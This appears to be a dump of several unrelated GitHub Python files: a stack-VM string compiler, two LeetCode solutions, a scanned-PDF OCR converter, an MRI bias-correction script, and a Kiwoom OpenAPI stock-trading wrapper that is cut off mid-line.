dbstore(str_start_pointer, _counter, commands)\n\n counter = Loop.simple(commands, data, cycle_body, return_counter=True)\n\n # Сюда переходим после того, как запишем нужное количество символов в создаваемую строку\n commands.add(Label, finish_label)\n\n # Дописываем 0 в последнюю ячейку памяти - это маркер конца строки\n commands.add(Push, 0)\n dbstore(str_start_pointer, counter, commands)\n\n # Отдаем на стек указатель на начало созданной строки для дальнейшего использования\n commands.add(Load, str_start_pointer)\n\n @staticmethod\n def strcmp(commands, data, type1, type2):\n \"\"\" Генерация инструкций для посимвольного сравнивания двух строк \"\"\"\n str1_start_pointer = data.var(Types.INT)\n str2_start_pointer = data.var(Types.INT)\n\n eq_label = data.label()\n not_eq_label = data.label()\n finish_label = data.label()\n\n commands.add(Store, str1_start_pointer)\n commands.add(Store, str2_start_pointer)\n\n def cycle_body(_counter, a, continue_label):\n # Загружаем n-ный символ 1-й строки\n dbload(str1_start_pointer, _counter, commands)\n # Дублируем на стек для дальнейшей проверки (чтобы не загружать снова)\n commands.add(Dup)\n # Загружаем n-ный символ 2-й строки\n dbload(str2_start_pointer, _counter, commands)\n commands.add(Compare, 1)\n # Если символы не равны, сразу переходим в секцию not_eq_label и выясняем уже там - какой из них больше\n # Это также работает, когда мы достиги конца одной из строк (какой-то символ и 0)\n commands.add(Jnz, not_eq_label)\n\n commands.add(Push, 0)\n # Сравниваем с 0 ранее продублированный символ (1-й строки) - если он равен нулю, то равен и второй,\n # т. к. в эту секцию мы попадаем только при равенстве обоих символов\n commands.add(Compare, 0)\n # 0 говорит о достижении конца строки - если это не 0, то продолжаем цикл\n commands.add(Jz, continue_label)\n # Сюда попадаем, когда достигли конца одновременно двух строк - т. е. они полностью равны\n commands.add(Jump, eq_label)\n\n counter = Loop.simple(commands, data, cycle_body, return_counter=True)\n\n # Секция полного равенства строк: пишем на стек 0\n commands.add(Label, eq_label)\n commands.add(Push, 0)\n commands.add(Jump, finish_label)\n\n # Секция неравенства строк\n commands.add(Label, not_eq_label)\n # Загружаем только второй символ - первый у нас уже содержится на стеке (см. тело цикла)\n dbload(str2_start_pointer, counter, commands)\n # Сравниваем символы оператором <\n commands.add(Compare, 2)\n # Производим нормировку результата сравнения: 0|1 -> -1|1\n commands.add(Push, 2)\n commands.add(Mul)\n commands.add(Push, 1)\n commands.add(Sub)\n\n commands.add(Label, finish_label)\n","repo_name":"petukhovv/compiler","sub_path":"src/Compiler/VM/Deep/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":12404,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"62"} +{"seq_id":"70870645958","text":"import collections\n\n\nclass Solution:\n def countBalls(self, lowLimit: int, highLimit: int) -> int:\n dt = collections.defaultdict(int)\n for i in range(lowLimit, highLimit + 1):\n x = 0\n while i:\n x += i % 10\n i //= 10\n dt[x] += 1\n return max(dt.values())\n","repo_name":"foolishzhao/leetcode","sub_path":"python3/weekly-contest-226/_1742_Maximum_Number_of_Balls_in_a_Box/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"4282489605","text":"# create a input folder and place the input file \r\n# create a output folder\r\n# create a image folder \r\n# install tessaract application from this url \r\n# ( https://digi.bib.uni-mannheim.de/tesseract/tesseract-ocr-w64-setup-v5.0.0-alpha.20201127.exe )\r\n# Then using pip install open cv and install pytersseract\r\n# pip install PyMuPDF\r\n# pip install PyPDF2\r\nimport time\r\nstart_time = time.time()\r\nimport fitz\r\nfrom win32com.client.dynamic import Dispatch\r\nimport pytesseract\r\nimport PyPDF2\r\nimport os\r\n\r\ndef Converting_pages_pdf_into_image(input_folder,input_file):\r\n os.chdir(input_folder)\r\n file = input_file\r\n pdf = fitz.open(file)\r\n page_count = pdf.pageCount # getting to tal no. of pages in the given pdf\r\n for j in range(page_count):\r\n page = pdf.loadPage(j)\r\n zoom_x = 6.0 # horizontal zoom\r\n zomm_y = 6.0 # vertical zoom\r\n mat = fitz.Matrix(zoom_x, zomm_y) # zoom factor 2 in each dimension\r\n pix = page.getPixmap(matrix = mat) # use 'mat' instead of the identity matrix\r\n new_file = file[0:-4]+'_'+str(j)+'.jpg'\r\n image_path='C://Users//anves//Downloads//pdf_search//images'\r\n os.chdir(image_path)\r\n pix.writeImage(new_file)\r\n print('pages of pdf are converted as high quality images')\r\n return image_path,input_file,page_count\r\n\r\n \r\ndef converting_image_to_editable_pdf(image_path): \r\n os.chdir(image_path)\r\n \r\n pytesseract.pytesseract.tesseract_cmd = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\r\n for filename in os.listdir(image_path):\r\n if filename.endswith(\".jpg\"):\r\n Img =filename\r\n pdf = pytesseract.image_to_pdf_or_hocr(Img, extension='pdf')\r\n with open(Img[0:-4]+'.pdf', 'w+b') as f:\r\n f.write(pdf)\r\n print('each image is converted to pdf')\r\n\r\ndef creating_final_editable_pdf(image_path,output_folder,input_file):\r\n os.chdir(image_path)\r\n x = [a for a in os.listdir() if a.endswith(\".pdf\")]\r\n \r\n for pdf in x:\r\n scale = PyPDF2.PdfFileReader(pdf)\r\n page = scale.getPage(0)\r\n page.scaleBy(0.175)\r\n writer = PyPDF2.PdfFileWriter() # create a writer to save the updated results\r\n writer.addPage(page)\r\n with open(pdf , \"wb+\") as f:\r\n writer.write(f)\r\n \r\n y = [a for a in os.listdir() if a.endswith(\".pdf\")]\r\n merger = PyPDF2.PdfFileMerger()\r\n for pdf in y:\r\n merger.append(open(pdf, 'rb'))\r\n os.chdir(output_folder)\r\n with open(input_file , \"wb\") as fout:\r\n merger.write(fout)\r\n print('complete editable pdf is created')\r\n return True\r\n \r\n\r\ninput_folder ='C://Users//anves//Downloads//pdf_search//input'\r\noutput_folder = 'C://Users//anves//Downloads//pdf_search//output'\r\nfor filename in os.listdir(input_folder):\r\n if filename.endswith(\".pdf\"):\r\n input_file =filename\r\n image_path,input_file,page_count = Converting_pages_pdf_into_image(input_folder,input_file)\r\n converting_image_to_editable_pdf(image_path)\r\n creating_final_editable_pdf(image_path, output_folder,input_file)\r\n\r\ndef doc_2_pdf(Input_File):\r\n word = Dispatch('word.Application') # initiation of word application\r\n word.Visible=False\r\n input_file = Input_File\r\n try:\r\n wb = word.Documents.Open(input_file)\r\n # Please Mentiion the oupout destination path here \r\n #/** the destination path should be different fdrom input path**\r\n output_file = 'C://Users//anves//Downloads//pdf_search//final//'+doc_pdf[0:-4]\r\n wb.ExportAsFixedFormat2 (output_file,\r\n ExportFormat=17,\r\n OpenAfterExport=False,\r\n OptimizeFor=0, \r\n Range=0,\r\n Item=7,\r\n IncludeDocProps=True,\r\n KeepIRM=True,\r\n CreateBookmarks=1,\r\n DocStructureTags=True,\r\n BitmapMissingFonts=True,\r\n UseISO19005_1=True,\r\n OptimizeForImageQuality=True\r\n )\r\n print(\"Bookmarking f thge pdf is done.\")\r\n wb.Close()\r\n word.Quit()\r\n except:\r\n word.Quit() \r\n \r\ninput_folder ='C://Users//anves//Downloads//pdf_search//output'\r\nos.chdir(input_folder)\r\nfor filename in os.listdir(input_folder):\r\n if filename.endswith(\".pdf\"):\r\n doc_pdf =filename\r\n Input_File = os.path.abspath(doc_pdf)\r\n doc_2_pdf(Input_File)\r\n #os.remove(input_file)\r\n\r\n continue\r\n else:\r\n continue\r\n\r\n \r\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\nos._exit(00)\r\n\r\n\r\n","repo_name":"datasciencesridhar/dlp","sub_path":"scanned_pdf_to_editable_pdf.py","file_name":"scanned_pdf_to_editable_pdf.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"4793506310","text":"import SimpleITK as sitk\nimport os\nimport sys\nfrom data_generation.preprocess import correct_bias\nimport shutil\n\nif __name__ == \"__main__\":\n subjects_folder = '/home/bella/Phd/data/brain/HASTE/HASTE/'\n out_folder = '/home/bella/Phd/data/brain/HASTE/HASTE_bfc/'\n all_in_one_dir = False\n vol_filename = 'volume.nii.gz'\n truth_file = 'truth.nii'\n\n if(all_in_one_dir == True):\n files = os.listdir(subjects_folder)\n for file in files:\n print('processing file: ' + file)\n correct_bias(os.path.join(subjects_folder,file), os.path.join(out_folder, file))\n else:\n dirs = os.listdir(subjects_folder)\n for dir in dirs:\n print('processing dir: ' + dir)\n out_dir_path = os.path.join(out_folder, dir)\n if(os.path.exists(out_dir_path)):\n continue\n\n os.mkdir(out_dir_path)\n\n correct_bias(os.path.join(subjects_folder, dir, vol_filename), os.path.join(out_dir_path, vol_filename))\n truth_path = os.path.join(subjects_folder,dir,truth_file)\n if(not os.path.exists(truth_path)):\n truth_path = os.path.join(subjects_folder,dir,'truth.nii.gz')\n shutil.copyfile(truth_path, os.path.join(out_dir_path,truth_file))","repo_name":"AnnaLevch/fetal_mr","sub_path":"data_generation/BFC_preprocessing.py","file_name":"BFC_preprocessing.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"30907030917","text":"#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\n@desc:\n@author: Luo.lu\n@date: 2018-11-2\n\n\"\"\"\nclass Solution:\n def findContentChildren(self, g, s):\n \"\"\"\n :type g: List[int]\n :type s: List[int]\n :rtype: int\n \"\"\"\n g = sorted(g)\n s = sorted(s)\n i = 0\n count = 0\n for item in g:\n while i < len(s) and item > s[i]:\n i += 1\n if i == len(s):\n break\n count += 1\n i += 1\n return count\n\n\nif __name__ == '__main__':\n A = Solution()\n print(A.findContentChildren([10,9,8,7], [5,6,7,8]))\n","repo_name":"mashpolo/leetcode_ans","sub_path":"400/leetcode455/ans.py","file_name":"ans.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11588120817","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QAxContainer import *\nfrom PyQt5.QtCore import *\nimport sqlite3\nimport pandas as pd\nimport time\nimport sys, os\nfrom datetime import datetime\n# import matplotlib.pyplot as plt\n\n#change the current working directory\n# path = r'D:\\myprojects\\TradingDB' + '\\\\' + datetime.today().strftime('%Y-%m-%d')\npath = r'D:\\myprojects\\TradingDB'\nif not os.path.exists(path):\n os.mkdir(path)\nos.chdir(path) \n\nTR_REQ_TIME_INTERVAL = 0.2\n\nclass Kiwoom(QAxWidget):\n def __init__(self):\n super().__init__()\n \n self.reset()\n self.OCX_available() \n self._event_handlers()\n self._login() \n self.account_info() \n self.all_stocks = self.stock_ticker() \n\n def OCX_available(self):\n self.setControl('KHOPENAPI.KHOpenAPICtrl.1')\n\n def reset(self):\n self.account_num = 0\n self.remaining_data = False\n self.fidlist = []\n self.tr_data = {}\n self.stockcode_non_realtime = 0\n self.requesting_time_unit = ''\n self.starting_time, self.lapse, self.SAVING_INTERVAL = time.time(), 0, 60*10 \n self.fids_dict = {\n '주식시세' : {10:'현재가', 11:'전일대비', 12:'등락율', 27:'매도호가', 28:'매수호가',\n 13:'누적거래량', 14:'누적거래대금', 16:'시가', 17:'고가', 18:'저가', 25:'전일대비기호',\n 26:'전일거래량대비', 29:'거래대금증감', 30:'전일거래량대비' ,31:'거래회전율', 23:'거래비용',\n 311:'시가총액(억)', 567:'상한가발생시간', 568:'하한가발생시간'},\n '주식체결' : {20:'체결시간', 10:'현재가', 11:'전일대비', 12:'등락율', 27:'매도호가', 28:'매수호가',\n 15:'거래량', 13:'누적거래량', 14:'누적거래대금', 16:'시가', 17:'고가', 18:'저가', 25:'전일대비기호',\n 26:'전일거래량대비', 29:'거래대금증감', 30:'전일거래량대비', 31:'거래회전율', 32:'거래비용', 288:'체결강도',\n 311:'시가총액(억)', 290:'장구분', 691:'KO접근도', 567:'상한가발생시간', 568:'하한가발생시간', 851:'전일동시간거래량비율'},\n '주문체결' : {9201:'계좌번호', 9203:'주문번호', 9205:'관리자사번', 9001:'종목코드,업종코드', 912:'주문업무분류',\n 913:'주문상태', 302:'종목명', 900:'주문수량', 901:'주문가격', 902:'미체결수량', 903:'체결누계금액',\n 904:'원주문번호', 905:'주문구분', 906:'매매���분', 907:'매도수구분', 908:'주문/체결시간', 909:'체결번호', \n 910:'체결가', 911:'체결량', 10:'현재가', 27:'매도호가', 28:'매수호가', 914:'단위체결가', 915:'단위체결량',\n 938:'당일매매수수료', 939:'당일매매세금', 919:'거부사유', 920:'화면번호', 921:'터미널번호', 922:'신용구분', 923:'대출일'},\n '잔고수신' : {9201:'계좌번호', 9203:'주문번호', 9001:'종목코드', 913:'주문상태', 302:'종목명', 900:'주문수량', 901:'주문가격', \n 902:'미체결수량', 903:'체결누계금액', 904:'원주문번호', 905:'주문구분', 906:'매매구분', 907:'매도수구분', \n 908:'주문/체결시간', 9009:'체결번호', 910:'체결가', 911:'체결량', 10:'현재가', 27:'(최우선)매도호가', \n 28:'(최우선)매수호가', 914:'단위체결가', 915:'단위체결량', 919:'거부사유', 920:'화면번호', 917:'신용구분', \n 916:'대출일', 930:'보유수량', 931:'매입단가', 932:'총매입가', 933:'주문가능수량', 945:'당일순매수수량', \n 946:'매도/매수구분', 950:'당일총매도손일', 951:'예수금', 307:'기준가', 8019:'손익율', 957:'신용금액', 958:'신용이자',\n 918:'만기일', 990:'당일실현손익(유가)', 991:'당일실현손익률(유가)', 993:'당일실현손익률(신용)', 397:'파생상품거래단위',\n 305:'상한가', 306:'하한가'},\n 'opt10079' : ['현재가', '거래량', '체결시간', '시가', '고가', '저가', '수정주가구분', '수정비율', '대업종구분', '소업종구분',\n '종목정보', '수정주가이벤트', '전일종가'],\n 'opt10080' : ['현재가', '거래량', '체결시간', '시가', '고가', '저가', '수정주가구분', '수정비율', '대업종구분', '소업종구분', \n '종목정보', '수정주가이벤트', '전일종가'],\n 'opt10081' : ['종목코드', '현재가', '거래량', '거래대금', '일자', '시가', '고가', '저가', '수정주가구분', '수정비율', '대업종구분',\n '소업종구분', '종목정보', '수정주가이벤트', '전일종가'],\n 'OPTKWFID' : ['종목코드', '종목명', '현재가', '기준가', '전일대비', '전일대비기호', '등락율', '거래량', '거래대금', '체결량', \n '체결강도', '전일거래량대비', '매도호가', '매수호가', '매도1차호가', '매도2차호가', '매도3차호가', '매도4차호가',\n '매도5차호가', '매수1차호가', '매수2차호가', '매수3차호가', '매수4차호가', '매수5차호가', '상한가', '하한가', '시가',\n '고가', '저가', '종가', '체결시간', '예상체결가', '예상체결량', '자본금', '액면가', '시가총액', '주식수', '호가시간',\n '일자', '우선매도잔량', '우선매수잔량', '우선매도건수', '우선매수건수', '총매도잔량', '총매수잔량', '총매도건수', \n '총매수건수', '패리티', '기어링', '손익분기', '자본지지', 'ELW행사가', '전환비율', 'ELW만기일', '미결제약정', '미결제전일대비',\n '이론가', '내재변동성', '델타', '감마', '쎄타', '베가', '로']\n }\n self.orders_dict = {\n '호가구분' : {'00':'지정가', '03':'시장가', '05':'조건부지정가', '06':'최유리지정가', '07':'최우선지정가', '10':'지정가IOC', '13':'시장가IOC', \n '16':'최유리IOC', '20':'지정가FOK', '23':'시장가FOK', '26':'최유리FOK', '61':'장전시간외종가', '62':'시간외단일가매매', '81':'장후시간외종가'},\n '주문리턴' : {0:'주문성공', -308:'1초5회이상주문에러'}\n }\n \n def _login(self):\n self.dynamicCall('CommConnect')\n self._event_loop_exec('login_loop')\n\n def _event_handlers(self):\n self.OnEventConnect.connect(self._comm_connect_event)\n self.OnReceiveTrData.connect(self._receive_tr_data)\n self.OnReceiveRealData.connect(self._receive_real_data)\n self.OnReceiveMsg.connect(self._receive_msg)\n self.OnReceiveChejanData.connect(self._receive_chejan_data)\n \n def _comm_connect_event(self, err_code):\n if err_code == 0:\n print('Successfully logged in')\n \n self._event_loop_exit('login_loop')\n print('Login loop exited')\n \n def data_from_sql(self, tablename, filename):\n with sqlite3.connect(filename) as file:\n return pd.read_sql(f'SELECT * FROM [{tablename}]', file) \n \n def _data_to_sql(self, tablename, filename, df):\n with sqlite3.connect(filename) as file:\n df.to_sql(tablename, file, if_exists='append')\n \n def account_info(self):\n #GetLoginInfo() takes its argument as a list form. Put all the input values in []\n self.account_num = self.dynamicCall('GetLoginInfo(QString)', ['ACCNO']).strip(';')\n print(self.account_num)\n\n def stock_ticker(self):\n #GetCodeListByMarket() takes its argument as a list form. Put all the input values in []\n response = self.dynamicCall('GetCodeListByMarket(QString)', ['']) # '' means all markets. '0' means KOSPI. '10' means KOSDAQ.\n tickers = response.split(';')\n stock_list = {}\n for ticker in tickers:\n stock = self.dynamicCall('GetMasterCodeName(QString)', [ticker])\n stock_list[ticker] = [stock]\n stock_list[stock] = ticker\n return stock_list\n \n def set_input_value(self, tr_name, tr_value):\n self.dynamicCall('SetInputValue(QString, QString)', tr_name, tr_value)\n \n def set_real_data(self, scrno, codelist, fidlist, opttype):\n for idx, code in enumerate(codelist):\n print(f'\\n\\nrequesting data of {code}')\n self.dynamicCall('SetRealReg(QString, QString, QString, QString)', f'00{idx+100}', code, fidlist, opttype)\n \n self._event_loop_exec('real')\n \n def set_order(self, rqname, scrno, accno, ordertype, code, qty, price, hogagb, orgorderno):\n #SendOrder() takes its argument as a list form. Put all the input values in []\n self.dynamicCall('SendOrder(QString, QString, QString, int, QString, int, int, QString, QString)', [rqname, scrno, accno, ordertype, code, qty, price, hogagb, orgorderno])\n \n self._event_loop_exec('order')\n \n def comm_rq_data(self, rqname, trcode, prenext, scrno):\n self.dynamicCall('CommRQData(QString, QString, int, QString)', rqname, trcode, prenext, scrno)\n self._event_loop_exec('tr')\n \n def comm_kw_rq_data(self, arrcode, prenext, codecnt, typeflag=0, rqname='OPTKWFID', scrno='0005'):\n self.dynamicCall('CommKwRqData(QString, int, int, int, QString, QString)', arrcode, prenext, codecnt, typeflag, rqname, scrno)\n self._event_loop_exec('big')\n \n def _event_loop_exec(self, loopname):\n exec(f'self.{loopname} = QEventLoop()')\n exec(f'self.{loopname}.exec_()')\n \n def _event_loop_exit(self, loopname):\n exec(f'self.{loopname}.exit()')\n \n def _receive_tr_data(self, scrno, rqname, trcode, recordname, prenext, unused1, unused2, unused3, unused4):\n if prenext == 2:\n self.remaining_data = True\n elif prenext == 0:\n self.remaining_data = False\n \n print('scrno, rqname, trcode, recordname, prenext, unused1, unused2, unused3, unused4: ->in _receive_tr_data\\n',\\\n scrno, rqname, trcode, recordname, prenext, unused1, unused2, unused3, unused4) \n\n if rqname == 'OPT10081':\n self._opt10081(rqname, trcode)\n elif rqname == 'OPT10079':\n self._opt10079(rqname, trcode)\n elif rqname == 'OPT10080':\n self._opt10080(rqname, trcode)\n elif rqname == 'OPTKWFID':\n self._optkwfid(trcode)\n\n # try:\n # self._event_loop_exit('tr')\n\n # except AttributeError:\n # pass\n \n def _receive_real_data(self, code, realtype, realdata):\n if realtype == '주식시세':\n self._realtype_stock_status(code) \n elif realtype == '주식체결':\n self._realtype_stock_made(code) \n elif realtype == '주문체결':\n self._realtype_order_made(code)\n \n def _receive_msg(self, scrno, rqname, trcode, msg):\n print('\\n\\nscrno, rqname, trcode, msg: ->in _receive_msg\\n', scrno, rqname, trcode, msg)\n add = {}\n stock = self.all_stocks[self.stockcode_non_realtime][0]\n msg_trimmed = msg.split()\n msg_trimmed[0] = msg_trimmed[0].strip('[]')\n add[datetime.now().strftime('%H:%M:%S')] = [stock, trcode, msg_trimmed[0], msg_trimmed[1], msg_trimmed[2]]\n self.tr_data['주문메세지'] = add\n # df_name, df = self._df_generator('주문메세지', self.stockcode_non_realtime, add)\n # self._data_to_sql('주문메세지', df_name+'.db', df)\n \n # try:\n # self._event_loop_exit('real')\n # except AttributeError:\n # pass\n \n def _receive_chejan_data(self, gubun, itemcnt, fidlist):\n print('gubun: -> in _receive_chejan_data\\n', gubun)\n if gubun == 0: #order placed and made \n self._real_chejan_placed_made(itemcnt, fidlist)\n elif gubun == 1:\n self._domestic_balance_change(itemcnt, fidlist)\n if fidlist in self.orders_dict['호가구분'].keys():\n add = {}\n for fid in fidlist:\n add[self.orders_dict['호가구분'][fid]] = self._get_chejan_data(fid)\n print('\\n\\nhogagubun in receive chejan data: ', add)\n \n def _domestic_balance_change(self, itemcnt, fidlist):\n print('\\n\\itemcnt, fidlist: -> in _domestic_balance_chanage\\n', itemcnt, fidlist)\n for item in itemcnt:\n for fid in fidlist:\n print('\\nchejan data: -> in _domestic_balance_chanage:\\n', self._get_chejan_data(fid))\n \n def _realtype_stock_status(self, code):\n add= {}\n fidlist = self.fids_dict['주식시세']\n\n for fid, fidname in fidlist.items():\n add[fidname] = [self._get_comm_real_data(code, fid)]\n \n self.requesting_time_unit = ''\n df_name, df = self._df_generator('주식시세', code, add)\n self.lapse = time.time()\n if len(df) > 10 or self.lapse - self.starting_time > self.SAVING_INTERVAL:\n self.starting_time = time.time()\n self._data_to_sql('주식시세', df_name+'.db', df) \n self.tr_data[df_name] = pd.DataFrame()\n \n def _realtype_stock_made(self, code): \n add= {}\n fidlist = self.fids_dict['주식체결']\n\n for fid, fidname in fidlist.items():\n add[fidname] = [self._get_comm_real_data(code, fid)]\n \n self.requesting_time_unit = ''\n df_name, df = self._df_generator('주식체결', code, add)\n self.lapse = time.time()\n if len(df) > 10 or self.lapse - self.starting_time > self.SAVING_INTERVAL:\n self.starting_time = time.time()\n self._data_to_sql('주식체결', df_name+'.db', df)\n self.tr_data[df_name] = pd.DataFrame()\n \n def _realtype_order_made(self, code):\n add= {}\n fidlist = self.fids_dict['주문체결']\n\n for fid, fidname in fidlist.items():\n add[fidname] = [self._get_comm_real_data(code, fid)]\n\n self.requesting_time_unit = ''\n df_name, df = self._df_generator('주문체결', code, add) \n self.lapse = time.time()\n if len(df) > 10 or self.lapse - self.starting_time > self.SAVING_INTERVAL:\n self.starting_time = time.time()\n self._data_to_sql('주문체결', df_name+'.db', df)\n self.tr_data[df_name] = pd.DataFrame()\n\n def _df_generator(self, realtype, stockcode, data):\n print('\\n\\nrealtype, stockcode, stock, data in df_generator: \\n', realtype, stockcode, self.all_stocks[stockcode][0], data)\n df_name = self.all_stocks[stockcode][0]+'_'+realtype+self.requesting_time_unit+'_'+datetime.today().strftime('%Y_%m_%d')\n if df_name in self.tr_data.keys():\n self.tr_data[df_name] = self.tr_data[df_name].append(pd.DataFrame(data), ignore_index=True)\n return df_name, self.tr_data[df_name]\n else:\n self.tr_data[df_name] = pd.DataFrame(data)\n return df_name, self.tr_data[df_name]\n \n def _get_comm_real_data(self, code, fid):\n return self.dynamicCall('GetCommRealData(QString, int)', code, fid) \n\n def _get_chejan_data(self, fid):\n return self.dynamicCall('GetChejanData(int)', fid)\n\n def _get_repeat_cont(self, trcode, recordname): \n print('\\nGetRepeatCnt: ', self.dynamicCall('GetRepeatCnt(QString, QString)', trcode, recordname)) \n return self.dynamicCall('GetRepeatCnt(QString, QString)', trcode, recordname)\n \n def _real_chejan_placed_made(self, itemcnt, fidlist): \n print('\\n\\itemcnt, fidlist: -> in_real_chejan_placed_made\\n', itemcnt, fidlist)\n \n for idx in itemcnt:\n for fid in fidlist:\n print('\\n\\chejan data: ->in _real_chejan_placed_made\\n', self._get_chejan_data(fid))\n \n\n def _opt10080(self, rqname, trcode):\n data_cnt = self._get_repeat_cont(trcode, '주식분봉차트')\n\n add = {}\n for idx in range(data_cnt):\n for key in self.fids_dict['opt10080']:\n add[key] = [self._get_comm_data(trcode, rqname, idx, key)]\n\n # add['현재가'] = [self._get_comm_data(trcode, rqname, idx, '현재가')]\n # add['거래량'] = [self._get_comm_data(trcode, rqname, idx, '거래량')]\n # add['체결시간'] = [self._get_comm_data(trcode, rqname, idx, '체결시간')]\n # add['시가'] = [self._get_comm_data(trcode, rqname, idx, '시가')]\n # add['고가'] = [self._get_comm_data(trcode, rqname, idx, '고가')]\n # add['저가'] = [self._get_comm_data(trcode, rqname, idx, '저가')]\n # add['수정주가구분'] = [self._get_comm_data(trcode, rqname, idx, '수정주가구분')]\n # add['수정비율'] = [self._get_comm_data(trcode, rqname, idx, '수정비율')]\n # add['대업종구분'] = [self._get_comm_data(trcode, rqname, idx, '대업종구분')]\n # add['소업종구분'] = [self._get_comm_data(trcode, rqname, idx, '소업종구분')]\n # add['종목정보'] = [self._get_comm_data(trcode, rqname, idx, '종목정보')]\n # add['수정주가이벤트'] = [self._get_comm_data(trcode, rqname, idx, '수정주가이벤트')]\n # add['전일종가'] = [self._get_comm_data(trcode, rqname, idx, '전일종가')]\n \n \n df_name, df = self._df_generator('주식분봉차트', self.stockcode_non_realtime, add)\n self._data_to_sql('주식분봉차트', df_name+'.db', df) \n print('\\n\\n_opt10080 request received:\\n', self.tr_data[df_name]) \n self.tr_data[df_name] = pd.DataFrame()\n \n def _opt10081(self, rqname, trcode):\n data_cnt = self._get_repeat_cont(trcode, '주식일봉차트')\n\n add = {}\n for idx in range(data_cnt):\n for key in self.fids_dict['opt10081']:\n add[key] = [self._get_comm_data(trcode, rqname, idx, key)] \n\n # add['일자'] = [self._get_comm_data(trcode, rqname, idx, '일자')]\n # add['시가'] = [self._get_comm_data(trcode, rqname, idx, '시가')]\n # add['고가'] = [self._get_comm_data(trcode, rqname, idx, '고가')]\n # add['저가'] = [self._get_comm_data(trcode, rqname, idx, '저가')]\n # add['현재가'] = [self._get_comm_data(trcode, rqname, idx, '현재가')]\n # add['거래량'] = [self._get_comm_data(trcode, rqname, idx, '거래량')]\n # add['거래대금'] = [self._get_comm_data(trcode, rqname, idx, '거래대금')]\n\n # for idx, key in enumerate(add.keys()):\n # if idx == 0:\n # continue \n # add[key] = int(add[key][0]) \n \n df_name, df = self._df_generator('주식일봉차트', self.stockcode_non_realtime, add)\n self._data_to_sql('주식일봉차트', df_name+'.db', df) \n print('\\n\\n_opt10081 request received:\\n', self.tr_data[df_name]) \n self.tr_data[df_name] = pd.DataFrame()\n\n def _opt10079(self, rqname, trcode):\n data_cnt = self._get_repeat_cont(trcode, '주식틱차트')\n \n add = {}\n for idx in range(data_cnt):\n for key in self.fids_dict['opt10079']:\n add[key] = [self._get_comm_data(trcode, rqname, idx, key)] \n\n # add['체결시간'] = [self._get_comm_data(trcode, rqname, idx, '체결시간')]\n # add['시가'] = [self._get_comm_data(trcode, rqname, idx, '시가')]\n # add['시가'] = [self._get_comm_data(trcode, rqname, idx, '시가')]\n # add['고가'] = [self._get_comm_data(trcode, rqname, idx, '고가')]\n # add['저가'] = [self._get_comm_data(trcode, rqname, idx, '저가')]\n # add['현재가'] = [self._get_comm_data(trcode, rqname, idx, '현재가')]\n # add['거래량'] = [self._get_comm_data(trcode, rqname, idx, '거래량')]\n \n # for idx, key in enumerate(add.keys()):\n # if idx == 0:\n # continue \n # add[key] = int(add[key][0]) \n\n df_name, df = self._df_generator('주식틱차트', self.stockcode_non_realtime, add)\n self._data_to_sql('주식틱차트', df_name+'.db', df) \n print('\\n\\n_opt10079 request received:\\n', self.tr_data[df_name]) \n self.tr_data[df_name] = pd.DataFrame()\n \n def _optkwfid(self, trcode):\n data_cnt = self._get_repeat_cont(trcode, '관심종목')\n \n add= {}\n for idx in range(data_cnt):\n for key in self.fids_dict['OPTKWFID']:\n add[key] = [self._get_comm_data(trcode, rqname, idx, key)]\n\n # add['종목코드'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '종목코드')] #0\n # add['종목명'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '종목명')] #1\n # add['현재가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '현재가')]\n # add['기준가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '기준가')]\n # add['전일대비'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '전일대비')]\n # add['전일대비기호'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '전일대비기호')]\n # add['등락율'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '등락율')] #6\n # add['거래량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '거래량')]\n # add['거래대금'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '거래대금')]\n # add['체결량'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '체결량')]\n # add['체결강도'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '체결강도')] #10\n # add['전일거래량대비'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '전일거래량대비')] #11\n # add['매도호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도호가')]\n # add['매수호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수호가')]\n # add['매도1차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도1차호가')]\n # add['매도2차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도2차호가')]\n # add['매도3차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도3차호가')]\n # add['매도4차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도4차호가')]\n # add['매도5차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매도5차호가')]\n # add['매수1차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수1차호가')]\n # add['매수2차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수2차호가')]\n # add['매수3차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수3차호가')]\n # add['매수4차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수4차호가')]\n # add['매수5차호가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '매수5차호가')]\n # add['상한가'] = [self._get_comm_data(trcode, 'OPTKWFID', idx, '상한가')]\n # add['하한가'] = [self._get_comm_data(trcode, 'OPTKWFID', 